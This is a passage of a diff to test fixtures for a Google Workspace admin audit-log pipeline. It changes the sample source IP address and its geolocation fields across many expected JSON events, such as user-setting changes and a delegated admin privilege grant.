         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1108,7 +1032,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1123,27 +1047,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8136,
+        "log.offset": 8117,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1167,7 +1087,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1182,27 +1102,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8590,
+        "log.offset": 8570,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1226,7 +1142,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1241,27 +1157,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9044,
+        "log.offset": 9023,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1285,7 +1197,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1300,27 +1212,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9502,
+        "log.offset": 9480,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1344,7 +1252,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1357,27 +1265,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9960,
+        "log.offset": 9937,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1401,7 +1305,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1414,27 +1318,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10345,
+        "log.offset": 10321,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1458,7 +1358,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1473,27 +1373,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10730,
+        "log.offset": 10705,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1517,7 +1413,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1532,27 +1428,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11184,
+        "log.offset": 11158,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1578,7 +1470,7 @@
         "event.end": "2002-10-02T16:00:00.000Z",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
         "event.provider": "admin",
         "event.start": "2002-10-02T15:00:00.000Z",
         "event.type": [
@@ -1597,27 +1489,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11637,
+        "log.offset": 11610,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1641,7 +1529,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -1656,27 +1544,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12429,
+        "log.offset": 12401,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1700,7 +1584,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1714,27 +1598,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12926,
+        "log.offset": 12897,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
